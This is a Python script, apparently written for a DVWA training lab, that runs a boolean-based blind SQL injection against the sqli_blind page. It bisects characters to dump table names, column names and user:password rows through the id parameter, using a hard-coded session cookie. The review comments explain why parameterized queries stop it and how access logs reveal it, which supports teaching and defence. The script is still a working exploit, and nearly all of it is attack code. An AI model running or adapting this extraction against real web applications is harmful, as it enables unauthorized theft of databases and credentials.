import sys
import requests
def getpayload(n,index,ascii):
    """Build the boolean-based blind SQL injection string for one comparison.

    Args:
        n: zero-based row offset, spliced into ``limit n,1``.
        index: 1-based character position, spliced into ``mid(..., index, 1)``.
        ascii: threshold; the injected condition is ``ascii(<char>) > ascii``.

    Returns:
        The text appended to the ``id`` query parameter. It only has an
        effect because the target concatenates ``id`` into its SQL statement
        unescaped; with a parameterized query (prepared statement) the same
        string is treated as a literal value and the comparison never runs.
    """
    star_str = "1' and "
    end_str = "--+&Submit=Submit#"
    # Changing the sql_str line below is enough to make this semi-automatic.
    # Enumerate table names:
    #sql_str = "ascii( mid((select table_name from information_schema.tables where table_schema=database() limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
    # Enumerate the columns of a given table:
    #sql_str = "ascii( mid((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
    # Read the actual row data:
    sql_str = "ascii( mid((select concat(user,':',password) from users limit "+str(n)+",1),"+str(index)+",1))>"+str(ascii)
    payload = star_str+sql_str+end_str
    return payload
def execute(n,index,ascii):
    """Send one injected GET request and report whether the condition held.

    The oracle is text presence, not an error: the page prints ``echo``
    ("First name") only when the injected ``... > ascii`` comparison is true.

    Args:
        n, index, ascii: forwarded unchanged to getpayload().

    Returns:
        True when ``echo`` occurs in the response body, False otherwise.

    NOTE(review):
        - The lab address and ``PHPSESSID`` are hard-coded. An expired session
          makes every probe answer False, which the caller reads as the
          sentinel 30 — a silent failure rather than an exception.
        - ``requests.get`` is called without ``timeout=``, so a stalled
          connection blocks the whole extraction indefinitely.
        - The payload travels in the query string, so every probe appears
          verbatim in the web server's access log; the ``ascii( mid(``
          pattern repeated hundreds of times from one client is a
          straightforward detection signature for this kind of extraction.
    """
    url = "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id="
    cookie = { 'security':'low',   # presumably DVWA's difficulty-level cookie — inferred from the name
               'PHPSESSID':'5j8pk2pu0er93e90tnscev4i46',   # fixed session id; must be refreshed when it expires
               'acopendivids':'swingset,jotto,phpbb2,redmine',
               'acgroupswithpersist':'nada' }
    echo = "First name"   # marker that is only rendered when the injected condition is true
    payload = ""   # dead store: overwritten on the next line
    payload = getpayload(n,index,ascii)
    exec_url = url+payload
    #print(exec_url)
    r = requests.get(exec_url,cookies=cookie)
    if echo in r.text:
        return True
    else:
        return False
def dichotomy(n,index):
    """Recover the ASCII code of character ``index`` of row ``n`` by bisection.

    Only the printable range is searched: the bounds start at 30 and 126 and
    each probe asks the oracle whether the character's code exceeds the
    midpoint, so at most about eight requests are spent per character.

    Returns:
        The resolved code, or 30 when the oracle never answers True — which
        is what an absent (empty) character looks like, so 30 doubles as the
        "no more characters" sentinel for the caller.
    """
    lo, hi = 30, 126
    code = lo
    while lo < hi:
        code = (lo + hi) // 2
        # Oracle True means the real code is greater than ``code``: raise the floor.
        if execute(n, index, code):
            lo = code
        else:
            hi = code
        # Two candidates left; one more probe on the lower one decides.
        if hi - lo == 1:
            code = hi if execute(n, index, lo) else lo
            break
    return code
if __name__ == "__main__":
    # Walk rows 0..9 of the query built in getpayload(); each row is rebuilt
    # one character at a time with the bisection in dichotomy().
    for i in range (10):
        count = 0
        name = ""
        # Positions 1..19 only — NOTE(review): any row longer than 19
        # characters is silently truncated here.
        for j in range(1,20):
            count += 1
            ascii = dichotomy(i,j)
            # 30 is dichotomy()'s "nothing printable" sentinel: stop this row.
            if ascii == 30:
                break
            name += chr(ascii)
        print(name)
        # Sentinel already at position 1 means the row came back empty —
        # presumably LIMIT ran past the last row — so stop enumerating.
        if count == 1:
            break